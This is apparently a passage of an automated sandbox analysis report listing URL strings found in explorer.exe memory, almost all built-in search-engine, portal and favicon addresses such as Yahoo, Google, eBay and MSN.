          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2138753603.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2168339499.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2149028138.0000000004297000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000007.00000000.2138753603.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
